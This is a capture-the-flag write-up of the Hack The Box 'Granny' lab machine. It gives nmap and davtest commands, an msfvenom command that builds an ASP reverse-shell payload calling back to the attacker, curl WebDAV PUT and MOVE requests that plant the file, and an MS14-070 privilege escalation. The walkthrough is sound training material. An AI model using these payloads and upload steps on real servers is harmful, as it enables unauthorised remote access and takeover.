Let’s get started!

Level:Medium

Enumeration

COMMAND: nmap -sC -sV -oN granny 10.10.10.15

Nmap-Scan

Let’s open the url in the webpage and check !

URL: http://10.10.10.15

After visiting the url we can see clearly that the site is under construction and may be some misconfigurations might be revealed and we can take advantage for further exploitation.

By checking the website directories with the use of dirb too, we could clearly know that there are some server misconfiguration . However, the port scan revealed that http webdav methods can used. A good way to test for this is with davtest.

COMMAND: davtest –url http://10.10.10.15

After looking around online i found a good sources online to use curl for method requests:
Webdav curl examples link

Exploitation


Firstly a shell needs to be generated to upload to the web server. Since the server is running asp as found in enumeration, an asp shell can be generated through msfvenom.

COMMAND: msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > exp1o1t9r.asp

Curl is used for sending the reverse shell as a .txt file. Then the MOVE method is used to change the file extension to .asp.

root@exp1o1t9r:~/htb/machines/granny# curl -T 'exp1o1t9r.txt' http://10.10.10.15/exp1o1t9r.txt root@exp1o1t9r:~/htb/machines/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/exp1o1t9r.asp' 'http://10.10.10.15/exp1o1t9r.txt' root@exp1o1t9r:~/htb/machines/granny# curl 'http://10.10.10.15/exp1o1t9r.asp'

After sending payload to the server we need to setup a listener inorder to get a reverse shell!

BOOM! we got shell. let’s pwn the user flag!!

ACCESS DENIED !!:(

Post exploitation


A whoami /all reveals that i do not have a privileged shell, this will require further post enumeration to get a privileged shell.

A sysinfo shows that the machine is an old version of windows running Windows server 2003 SP2.

After some research, several local exploits have been found at:

Local windows exploits link

The MS14-070 exploit appeared to be what i was looking for. The exploit was put onto the target machine the same way as the reverse shell. When executing the exploit there was a problem with the exploit not working properly. The process was running but it was stuck.

To solve this, metasploit is used to convert the shell to meterpreter and migrate the process.

use the exploit to bypass privileges!!

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

5 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here